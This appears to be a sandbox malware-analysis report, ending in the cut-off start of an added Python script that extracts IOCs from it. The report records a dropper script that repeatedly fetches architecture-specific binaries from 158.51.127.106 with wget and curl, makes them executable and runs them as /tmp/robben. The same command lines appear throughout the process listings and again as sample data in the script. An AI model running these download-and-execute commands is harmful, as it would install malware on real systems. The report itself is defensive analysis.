[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| GB | 185.125.190.82:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.165:80 | se.archive.ubuntu.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:31
Platform
debian12-armhf-20240418-en
Max time kernel
78s
Max time network
584s
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-timedated.service-ocZ6ND]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | 0.debian.pool.ntp.org | udp |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:53
Platform
debian9-mipsbe-20240611-en
Max time kernel
86s
Max time network
114s
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:55
Platform
debian9-mipsel-20240226-en
Max time kernel
286s
Max time network
315s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-VwZarq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
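The Processes sections of behavioral4 and behavioral5 above show the same loop eleven times: fetch http://158.51.127.106/bins/<arch> with wget and again with curl, `cat` the fetched file (the sandbox records only the `cat`; the "File opened for modification /tmp/robben" by /tmp/download.sh signature is consistent with the shell redirecting that output into robben, which is an inference, not something the report states), `chmod +x` in /tmp (the stray systemd-private-* names in the chmod arguments look like a glob expanded against the sandbox's /tmp, again an inference), then run `./robben Payload`. The script below is an added example for this page, not code from the sandbox or from the sample: it reconstructs that chain from a flat process list in the report's own format, extracts the IOCs (download host, URLs, architecture names, dropped binary), and cross-checks the host against rows in the report's Network table format. The sample input is copied from the behavioral5 Processes and Network sections (two of the eleven iterations); the detection rules are this example's assumptions about what a defender would key on, not the sandbox's own signatures.

```python
"""Reconstruct a multi-architecture download-and-execute chain from a sandbox
process list and pull out its IOCs. Added example for this report page; not
the sandbox's or the sample's code. Detection rules are assumptions."""
import re
from urllib.parse import urlparse

# Process entries in the report's format (executable path, then the command
# line in brackets). Copied from the behavioral5 Processes section.
REPORT_LINES = """
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-VwZarq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
"""

# Two rows in the report's Network table format (Country, Destination,
# Domain, Proto); constructed from the behavioral2 and behavioral5 tables.
NETWORK_ROWS = """
| US | 158.51.127.106:80 | | tcp |
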